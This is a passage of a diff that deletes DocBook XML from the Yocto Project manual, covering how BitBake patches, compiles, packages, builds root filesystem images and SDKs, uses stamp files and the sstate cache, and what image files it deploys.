-                    task uses a recipe's
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                    statements and the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
-                    variable to locate applicable patch files.
-                </para>
-
-                <para>
-                    Default processing for patch files assumes the files have
-                    either <filename>*.patch</filename> or
-                    <filename>*.diff</filename> file types.
-                    You can use <filename>SRC_URI</filename> parameters to
-                    change the way the build system recognizes patch files.
-                    See the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
-                    task for more information.
-                </para>
-
-                <para>
-                    BitBake finds and applies multiple patches for a single
-                    recipe in the order in which it locates the patches.
-                    The <filename>FILESPATH</filename> variable defines the
-                    default set of directories that the build system uses to
-                    search for patch files.
-                    Once found, patches are applied to the recipe's source
-                    files, which are located in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>
-                    directory.
-                </para>
-
-                <para>
-                    For more information on how the source directories are
-                    created, see the
-                    "<link linkend='source-fetching-dev-environment'>Source Fetching</link>"
-                    section.
-                    For more information on how to create patches and how the
-                    build system processes patches, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-patching-code'>Patching Code</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    You can also see the
-                    "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-devtool-use-devtool-modify-to-modify-the-source-of-an-existing-component'>Use <filename>devtool modify</filename> to Modify the Source of an Existing Component</ulink>"
-                    section in the Yocto Project Application Development and
-                    the Extensible Software Development Kit (SDK) manual and
-                    the
-                    "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</ulink>"
-                    section in the Yocto Project Linux Kernel Development
-                    Manual.
-                </para>
-            </section>
-
-            <section id='configuration-compilation-and-staging-dev-environment'>
-                <title>Configuration, Compilation, and Staging</title>
-
-                <para>
-                    After source code is patched, BitBake executes tasks that
-                    configure and compile the source code.
-                    Once compilation occurs, the files are copied to a holding
-                    area (staged) in preparation for packaging:
-                    <imagedata fileref="figures/configuration-compile-autoreconf.png" align="center" width="7in" depth="5in" />
-                </para>
-
-                <para>
-                    This step in the build process consists of the following
-                    tasks:
-                    <itemizedlist>
-                        <listitem><para>
-                            <emphasis><ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-prepare_recipe_sysroot'><filename>do_prepare_recipe_sysroot</filename></ulink></emphasis>:
-                            This task sets up the two sysroots in
-                            <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}</filename>
-                            (i.e. <filename>recipe-sysroot</filename> and
-                            <filename>recipe-sysroot-native</filename>) so that
-                            during the packaging phase the sysroots can contain
-                            the contents of the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></ulink>
-                            tasks of the recipes on which the recipe
-                            containing the tasks depends.
-                            A sysroot exists for both the target and for the
-                            native binaries, which run on the host system.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis><filename>do_configure</filename></emphasis>:
-                            This task configures the source by enabling and
-                            disabling any build-time and configuration options
-                            for the software being built.
-                            Configurations can come from the recipe itself as
-                            well as from an inherited class.
-                            Additionally, the software itself might configure
-                            itself depending on the target for which it is
-                            being built.</para>
-
-                            <para>The configurations handled by the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
-                            task are specific to configurations for the source
-                            code being built by the recipe.</para>
-
-                            <para>If you are using the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-autotools'><filename>autotools</filename></ulink>
-                            class, you can add additional configuration options
-                            by using the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></ulink>
-                            or
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></ulink>
-                            variables.
-                            For information on how this variable works within
-                            that class, see the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-autotools'><filename>autotools</filename></ulink>
-                            class
-                            <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/classes/autotools.bbclass'>here</ulink>.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis><filename>do_compile</filename></emphasis>:
-                            Once a configuration task has been satisfied,
-                            BitBake compiles the source using the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>
-                            task.
-                            Compilation occurs in the directory pointed to by
-                            the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-B'><filename>B</filename></ulink>
-                            variable.
-                            Realize that the <filename>B</filename> directory
-                            is, by default, the same as the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>
-                            directory.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis><filename>do_install</filename></emphasis>:
-                            After compilation completes, BitBake executes the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
-                            task.
-                            This task copies files from the
-                            <filename>B</filename> directory and places them
-                            in a holding area pointed to by the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink>
-                            variable.
-                            Packaging occurs later using files from this
-                            holding directory.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-
-            <section id='package-splitting-dev-environment'>
-                <title>Package Splitting</title>
-
-                <para>
-                    After source code is configured, compiled, and staged, the
-                    build system analyzes the results and splits the output
-                    into packages:
-                    <imagedata fileref="figures/analysis-for-package-splitting.png" align="center" width="7in" depth="7in" />
-                </para>
-
-                <para>
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
-                    and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-packagedata'><filename>do_packagedata</filename></ulink>
-                    tasks combine to analyze the files found in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink>
-                    directory and split them into subsets based on available
-                    packages and files.
-                    Analysis involves the following as well as other items:
-                    splitting out debugging symbols, looking at shared library
-                    dependencies between packages, and looking at package
-                    relationships.
-                </para>
-
-                <para>
-                    The <filename>do_packagedata</filename> task creates
-                    package metadata based on the analysis such that the
-                    build system can generate the final packages.
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></ulink>
-                    task stages (copies) a subset of the files installed by
-                    the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
-                    task into the appropriate sysroot.
-                    Working, staged, and intermediate results of the analysis
-                    and package splitting process use several areas:
-                    <itemizedlist>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGD'><filename>PKGD</filename></ulink>:
-                            The destination directory
-                            (i.e. <filename>package</filename>) for packages
-                            before they are split into individual packages.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGDESTWORK'><filename>PKGDESTWORK</filename></ulink>:
-                            A temporary work area (i.e.
-                            <filename>pkgdata</filename>) used by the
-                            <filename>do_package</filename> task to save
-                            package metadata.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGDEST'><filename>PKGDEST</filename></ulink>:
-                            The parent directory (i.e.
-                            <filename>packages-split</filename>) for packages
-                            after they have been split.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></ulink>:
-                            A shared, global-state directory that holds
-                            packaging metadata generated during the packaging
-                            process.
-                            The packaging process copies metadata from
-                            <filename>PKGDESTWORK</filename> to the
-                            <filename>PKGDATA_DIR</filename> area where it
-                            becomes globally available.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></ulink>:
-                            The path for the sysroot for the system on which
-                            a component is built to run (i.e.
-                            <filename>recipe-sysroot</filename>).
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_DIR_NATIVE'><filename>STAGING_DIR_NATIVE</filename></ulink>:
-                            The path for the sysroot used when building
-                            components for the build host (i.e.
-                            <filename>recipe-sysroot-native</filename>).
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_DIR_TARGET'><filename>STAGING_DIR_TARGET</filename></ulink>:
-                            The path for the sysroot used when a component that
-                            is built to execute on a system and it generates
-                            code for yet another machine (e.g. cross-canadian
-                            recipes).
-                            </para></listitem>
-                    </itemizedlist>
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES</filename></ulink>
-                    variable defines the files that go into each package in
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>.
-                    If you want details on how this is accomplished, you can
-                    look at
-                    <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/classes/package.bbclass'><filename>package.bbclass</filename></ulink>.
-                </para>
-
-                <para>
-                    Depending on the type of packages being created (RPM, DEB,
-                    or IPK), the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_deb'><filename>do_package_write_*</filename></ulink>
-                    task creates the actual packages and places them in the
-                    Package Feed area, which is
-                    <filename>${TMPDIR}/deploy</filename>.
-                    You can see the
-                    "<link linkend='package-feeds-dev-environment'>Package Feeds</link>"
-                    section for more detail on that part of the build process.
-                    <note>
-                        Support for creating feeds directly from the
-                        <filename>deploy/*</filename> directories does not
-                        exist.
-                        Creating such feeds usually requires some kind of feed
-                        maintenance mechanism that would upload the new
-                        packages into an official package feed (e.g. the
-                        Ångström distribution).
-                        This functionality is highly distribution-specific
-                        and thus is not provided out of the box.
-                    </note>
-                </para>
-            </section>
-
-            <section id='image-generation-dev-environment'>
-                <title>Image Generation</title>
-
-                <para>
-                    Once packages are split and stored in the Package Feeds
-                    area, the build system uses BitBake to generate the root
-                    filesystem image:
-                    <imagedata fileref="figures/image-generation.png" align="center" width="7.5in" depth="7.5in" />
-                </para>
-
-                <para>
-                    The image generation process consists of several stages and
-                    depends on several tasks and variables.
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-rootfs'><filename>do_rootfs</filename></ulink>
-                    task creates the root filesystem (file and directory
-                    structure) for an image.
-                    This task uses several key variables to help create the
-                    list of packages to actually install:
-                    <itemizedlist>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>:
-                            Lists out the base set of packages from which to
-                            install from the Package Feeds area.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_EXCLUDE'><filename>PACKAGE_EXCLUDE</filename></ulink>:
-                            Specifies packages that should not be installed
-                            into the image.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>:
-                            Specifies features to include in the image.
-                            Most of these features map to additional packages
-                            for installation.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>:
-                            Specifies the package backend (e.g. RPM, DEB, or
-                            IPK) to use and consequently helps determine where
-                            to locate packages within the Package Feeds area.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_LINGUAS'><filename>IMAGE_LINGUAS</filename></ulink>:
-                            Determines the language(s) for which additional
-                            language support packages are installed.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_INSTALL'><filename>PACKAGE_INSTALL</filename></ulink>:
-                            The final list of packages passed to the package
-                            manager for installation into the image.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    With
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></ulink>
-                    pointing to the location of the filesystem under
-                    construction and the <filename>PACKAGE_INSTALL</filename>
-                    variable providing the final list of packages to install,
-                    the root file system is created.
-                </para>
-
-                <para>
-                    Package installation is under control of the package
-                    manager (e.g. dnf/rpm, opkg, or apt/dpkg) regardless of
-                    whether or not package management is enabled for the
-                    target.
-                    At the end of the process, if package management is not
-                    enabled for the target, the package manager's data files
-                    are deleted from the root filesystem.
-                    As part of the final stage of package installation,
-                    post installation scripts that are part of the packages
-                    are run.
-                    Any scripts that fail to run on the build host are run on
-                    the target when the target system is first booted.
-                    If you are using a
-                    <ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-read-only-root-filesystem'>read-only root filesystem</ulink>,
-                    all the post installation scripts must succeed on the
-                    build host during the package installation phase since the
-                    root filesystem on the target is read-only.
-                </para>
-
-                <para>
-                    The final stages of the <filename>do_rootfs</filename> task
-                    handle post processing.
-                    Post processing includes creation of a manifest file and
-                    optimizations.
-                </para>
-
-                <para>
-                    The manifest file (<filename>.manifest</filename>) resides
-                    in the same directory as the root filesystem image.
-                    This file lists out, line-by-line, the installed packages.
-                    The manifest file is useful for the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-testimage*'><filename>testimage</filename></ulink>
-                    class, for example, to determine whether or not to run
-                    specific tests.
-                    See the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_MANIFEST'><filename>IMAGE_MANIFEST</filename></ulink>
-                    variable for additional information.
-                </para>
-
-                <para>
-                    Optimizing processes that are run across the image include
-                    <filename>mklibs</filename>, <filename>prelink</filename>,
-                    and any other post-processing commands as defined by the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-ROOTFS_POSTPROCESS_COMMAND'><filename>ROOTFS_POSTPROCESS_COMMAND</filename></ulink>
-                    variable.
-                    The <filename>mklibs</filename> process optimizes the size
-                    of the libraries, while the <filename>prelink</filename>
-                    process optimizes the dynamic linking of shared libraries
-                    to reduce start up time of executables.
-                </para>
-
-                <para>
-                    After the root filesystem is built, processing begins on
-                    the image through the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-image'><filename>do_image</filename></ulink>
-                    task.
-                    The build system runs any pre-processing commands as
-                    defined by the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_PREPROCESS_COMMAND'><filename>IMAGE_PREPROCESS_COMMAND</filename></ulink>
-                    variable.
-                    This variable specifies a list of functions to call before
-                    the build system creates the final image output files.
-                </para>
-
-                <para>
-                    The build system dynamically creates
-                    <filename>do_image_*</filename> tasks as needed, based
-                    on the image types specified in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></ulink>
-                    variable.
-                    The process turns everything into an image file or a set of
-                    image files and can compress the root filesystem image to
-                    reduce the overall size of the image.
-                    The formats used for the root filesystem depend on the
-                    <filename>IMAGE_FSTYPES</filename> variable.
-                    Compression depends on whether the formats support
-                    compression.
-                </para>
-
-                <para>
-                    As an example, a dynamically created task when creating a
-                    particular image <replaceable>type</replaceable> would
-                    take the following form:
-                    <literallayout class='monospaced'>
-     do_image_<replaceable>type</replaceable>
-                    </literallayout>
-                    So, if the <replaceable>type</replaceable> as specified by
-                    the <filename>IMAGE_FSTYPES</filename> were
-                    <filename>ext4</filename>, the dynamically generated task
-                    would be as follows:
-                    <literallayout class='monospaced'>
-     do_image_ext4
-                    </literallayout>
-                </para>
-
-                <para>
-                    The final task involved in image creation is the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-image-complete'><filename>do_image_complete</filename></ulink>
-                    task.
-                    This task completes the image by applying any image
-                    post processing as defined through the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_POSTPROCESS_COMMAND'><filename>IMAGE_POSTPROCESS_COMMAND</filename></ulink>
-                    variable.
-                    The variable specifies a list of functions to call once the
-                    build system has created the final image output files.
-                    <note>
-                        The entire image generation process is run under
-                        <link linkend='fakeroot-and-pseudo'>Pseudo</link>.
-                        Running under Pseudo ensures that the files in the
-                        root filesystem have correct ownership.
-                    </note>
-                </para>
-            </section>
-
-            <section id='sdk-generation-dev-environment'>
-                <title>SDK Generation</title>
-
-                <para>
-                    The OpenEmbedded build system uses BitBake to generate the
-                    Software Development Kit (SDK) installer scripts for both
-                    the standard SDK and the extensible SDK (eSDK):
-                </para>
-
-                <para>
-                    <imagedata fileref="figures/sdk-generation.png" width="9in" align="center" />
-                    <note>
-                        For more information on the cross-development toolchain
-                        generation, see the
-                        "<link linkend='cross-development-toolchain-generation'>Cross-Development Toolchain Generation</link>"
-                        section.
-                        For information on advantages gained when building a
-                        cross-development toolchain using the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sdk'><filename>do_populate_sdk</filename></ulink>
-                        task, see the
-                        "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-building-an-sdk-installer'>Building an SDK Installer</ulink>"
-                        section in the Yocto Project Application Development
-                        and the Extensible Software Development Kit (eSDK)
-                        manual.
-                    </note>
-                </para>
-
-                <para>
-                    Like image generation, the SDK script process consists of
-                    several stages and depends on many variables.
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sdk'><filename>do_populate_sdk</filename></ulink>
-                    and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sdk_ext'><filename>do_populate_sdk_ext</filename></ulink>
-                    tasks use these key variables to help create the list of
-                    packages to actually install.
-                    For information on the variables listed in the figure,
-                    see the
-                    "<link linkend='sdk-dev-environment'>Application Development SDK</link>"
-                    section.
-                </para>
-
-                <para>
-                    The <filename>do_populate_sdk</filename> task helps create
-                    the standard SDK and handles two parts: a target part and a
-                    host part.
-                    The target part is the part built for the target hardware
-                    and includes libraries and headers.
-                    The host part is the part of the SDK that runs on the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>.
-                </para>
-
-                <para>
-                    The <filename>do_populate_sdk_ext</filename> task helps
-                    create the extensible SDK and handles host and target parts
-                    differently than its counter part does for the standard SDK.
-                    For the extensible SDK, the task encapsulates the build
-                    system, which includes everything needed (host and target)
-                    for the SDK.
-                </para>
-
-                <para>
-                    Regardless of the type of SDK being constructed, the
-                    tasks perform some cleanup after which a cross-development
-                    environment setup script and any needed configuration files
-                    are created.
-                    The final output is the Cross-development
-                    toolchain installation script (<filename>.sh</filename>
-                    file), which includes the environment setup script.
-                </para>
-            </section>
-
-            <section id='stamp-files-and-the-rerunning-of-tasks'>
-                <title>Stamp Files and the Rerunning of Tasks</title>
-
-                <para>
-                    For each task that completes successfully, BitBake writes a
-                    stamp file into the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-STAMPS_DIR'><filename>STAMPS_DIR</filename></ulink>
-                    directory.
-                    The beginning of the stamp file's filename is determined
-                    by the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-STAMP'><filename>STAMP</filename></ulink>
-                    variable, and the end of the name consists of the task's
-                    name and current
-                    <link linkend='overview-checksums'>input checksum</link>.
-                    <note>
-                        This naming scheme assumes that
-                        <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_SIGNATURE_HANDLER'><filename>BB_SIGNATURE_HANDLER</filename></ulink>
-                        is "OEBasicHash", which is almost always the case in
-                        current OpenEmbedded.
-                    </note>
-                    To determine if a task needs to be rerun, BitBake checks
-                    if a stamp file with a matching input checksum exists
-                    for the task.
-                    If such a stamp file exists, the task's output is
-                    assumed to exist and still be valid.
-                    If the file does not exist, the task is rerun.
-                    <note>
-                        <para>The stamp mechanism is more general than the
-                        shared state (sstate) cache mechanism described in the
-                        "<link linkend='setscene-tasks-and-shared-state'>Setscene Tasks and Shared State</link>"
-                        section.
-                        BitBake avoids rerunning any task that has a valid
-                        stamp file, not just tasks that can be accelerated
-                        through the sstate cache.</para>
-
-                        <para>However, you should realize that stamp files only
-                        serve as a marker that some work has been done and that
-                        these files do not record task output.
-                        The actual task output would usually be somewhere in
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>
-                        (e.g. in some recipe's
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>.)
-                        What the sstate cache mechanism adds is a way to cache
-                        task output that can then be shared between build
-                        machines.</para>
-                    </note>
-                    Since <filename>STAMPS_DIR</filename> is usually a
-                    subdirectory of <filename>TMPDIR</filename>, removing
-                    <filename>TMPDIR</filename> will also remove
-                    <filename>STAMPS_DIR</filename>, which means tasks will
-                    properly be rerun to repopulate
-                    <filename>TMPDIR</filename>.
-                </para>
-
-                <para>
-                    If you want some task to always be considered "out of
-                    date", you can mark it with the
-                    <ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'><filename>nostamp</filename></ulink>
-                    varflag.
-                    If some other task depends on such a task, then that
-                    task will also always be considered out of date, which
-                    might not be what you want.
-                </para>
-
-                <para>
-                    For details on how to view information about a task's
-                    signature, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-viewing-task-variable-dependencies'>Viewing Task Variable Dependencies</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </section>
-
-            <section id='setscene-tasks-and-shared-state'>
-                <title>Setscene Tasks and Shared State</title>
-
-                <para>
-                    The description of tasks so far assumes that BitBake needs
-                    to build everything and no available prebuilt objects
-                    exist.
-                    BitBake does support skipping tasks if prebuilt objects are
-                    available.
-                    These objects are usually made available in the form of a
-                    shared state (sstate) cache.
-                    <note>
-                        For information on variables affecting sstate, see the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>
-                        and
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></ulink>
-                        variables.
-                    </note>
-                </para>
-
-                <para>
-                    The idea of a setscene task (i.e
-                    <filename>do_</filename><replaceable>taskname</replaceable><filename>_setscene</filename>)
-                    is a version of the task where
-                    instead of building something, BitBake can skip to the end
-                    result and simply place a set of files into specific
-                    locations as needed.
-                    In some cases, it makes sense to have a setscene task
-                    variant (e.g. generating package files in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_deb'><filename>do_package_write_*</filename></ulink>
-                    task).
-                    In other cases, it does not make sense (e.g. a
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
-                    task or a
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-unpack'><filename>do_unpack</filename></ulink>
-                    task) since the work involved would be equal to or greater
-                    than the underlying task.
-                </para>
-
-                <para>
-                    In the build system, the common tasks that have setscene
-                    variants are
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>,
-                    <filename>do_package_write_*</filename>,
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-deploy'><filename>do_deploy</filename></ulink>,
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-packagedata'><filename>do_packagedata</filename></ulink>,
-                    and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></ulink>.
-                    Notice that these tasks represent most of the tasks whose
-                    output is an end result.
-                </para>
-
-                <para>
-                    The build system has knowledge of the relationship between
-                    these tasks and other preceding tasks.
-                    For example, if BitBake runs
-                    <filename>do_populate_sysroot_setscene</filename> for
-                    something, it does not make sense to run any of the
-                    <filename>do_fetch</filename>,
-                    <filename>do_unpack</filename>,
-                    <filename>do_patch</filename>,
-                    <filename>do_configure</filename>,
-                    <filename>do_compile</filename>, and
-                    <filename>do_install</filename> tasks.
-                    However, if <filename>do_package</filename> needs to be
-                    run, BitBake needs to run those other tasks.
-                </para>
-
-                <para>
-                    It becomes more complicated if everything can come
-                    from an sstate cache because some objects are simply
-                    not required at all.
-                    For example, you do not need a compiler or native tools,
-                    such as quilt, if nothing exists to compile or patch.
-                    If the <filename>do_package_write_*</filename> packages
-                    are available from sstate, BitBake does not need the
-                    <filename>do_package</filename> task data.
-                </para>
-
-                <para>
-                    To handle all these complexities, BitBake runs in two
-                    phases.
-                    The first is the "setscene" stage.
-                    During this stage, BitBake first checks the sstate cache
-                    for any targets it is planning to build.
-                    BitBake does a fast check to see if the object exists
-                    rather than a complete download.
-                    If nothing exists, the second phase, which is the setscene
-                    stage, completes and the main build proceeds.
-                </para>
-
-                <para>
-                    If objects are found in the sstate cache, the build system
-                    works backwards from the end targets specified by the user.
-                    For example, if an image is being built, the build system
-                    first looks for the packages needed for that image and the
-                    tools needed to construct an image.
-                    If those are available, the compiler is not needed.
-                    Thus, the compiler is not even downloaded.
-                    If something was found to be unavailable, or the
-                    download or setscene task fails, the build system then
-                    tries to install dependencies, such as the compiler, from
-                    the cache.
-                </para>
-
-                <para>
-                    The availability of objects in the sstate cache is
-                    handled by the function specified by the
-                    <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_HASHCHECK_FUNCTION'><filename>BB_HASHCHECK_FUNCTION</filename></ulink>
-                    variable and returns a list of available objects.
-                    The function specified by the
-                    <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_SETSCENE_DEPVALID'><filename>BB_SETSCENE_DEPVALID</filename></ulink>
-                    variable is the function that determines whether a given
-                    dependency needs to be followed, and whether for any given
-                    relationship the function needs to be passed.
-                    The function returns a True or False value.
-                </para>
-            </section>
-        </section>
-
-        <section id='images-dev-environment'>
-            <title>Images</title>
-
-            <para>
-                The images produced by the build system are compressed forms
-                of the root filesystem and are ready to boot on a target
-                device.
-                You can see from the
-                <link linkend='general-workflow-figure'>general workflow figure</link>
-                that BitBake output, in part, consists of images.
-                This section takes a closer look at this output:
-                <imagedata fileref="figures/images.png" align="center" width="5.5in" depth="5.5in" />
-            </para>
-
-            <note>
-                For a list of example images that the Yocto Project provides,
-                see the
-                "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
-                chapter in the Yocto Project Reference Manual.
-            </note>
-
-            <para>
-                The build process writes images out to the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                inside the
-                <filename>tmp/deploy/images/<replaceable>machine</replaceable>/</filename>
-                folder as shown in the figure.
-                This folder contains any files expected to be loaded on the
-                target device.
-                The
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></ulink>
-                variable points to the <filename>deploy</filename> directory,
-                while the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></ulink>
-                variable points to the appropriate directory containing images
-                for the current configuration.
-                <itemizedlist>
-                    <listitem><para>
-                        <replaceable>kernel-image</replaceable>:
-                        A kernel binary file.
-                        The
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_IMAGETYPE'><filename>KERNEL_IMAGETYPE</filename></ulink>
-                        variable determines the naming scheme for the
-                        kernel image file.
-                        Depending on this variable, the file could begin with
-                        a variety of naming strings.
-                        The
-                        <filename>deploy/images/</filename><replaceable>machine</replaceable>
-                        directory can contain multiple image files for the
-                        machine.
-                        </para></listitem>
-                    <listitem><para>
-                        <replaceable>root-filesystem-image</replaceable>:
-                        Root filesystems for the target device (e.g.
-                        <filename>*.ext3</filename> or
-                        <filename>*.bz2</filename> files).
-                        The
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></ulink>
-                        variable determines the root filesystem image type.
-                        The
-                        <filename>deploy/images/</filename><replaceable>machine</replaceable>
-                        directory can contain multiple root filesystems for the
-                        machine.
-                        </para></listitem>
-                    <listitem><para>
-                        <replaceable>kernel-modules</replaceable>:
-                        Tarballs that contain all the modules built for the
-                        kernel.
-                        Kernel module tarballs exist for legacy purposes and
-                        can be suppressed by setting the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MODULE_TARBALL_DEPLOY'><filename>MODULE_TARBALL_DEPLOY</filename></ulink>
-                        variable to "0".
-                        The
-                        <filename>deploy/images/</filename><replaceable>machine</replaceable>
-                        directory can contain multiple kernel module tarballs
-                        for the machine.
-                        </para></listitem>
-                    <listitem><para>
-                        <replaceable>bootloaders</replaceable>:
-                        If applicable to the target machine, bootloaders
-                        supporting the image.
-                        The <filename>deploy/images/</filename><replaceable>machine</replaceable>
-                        directory can contain multiple bootloaders for the
-                        machine.
-                        </para></listitem>
-                    <listitem><para>
-                        <replaceable>symlinks</replaceable>:
-                        The
-                        <filename>deploy/images/</filename><replaceable>machine</replaceable>
-                        folder contains a symbolic link that points to the
-                        most recently built file for each machine.
-                        These links might be useful for external scripts that
-                        need to obtain the latest version of each file.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='sdk-dev-environment'>
-            <title>Application Development SDK</title>
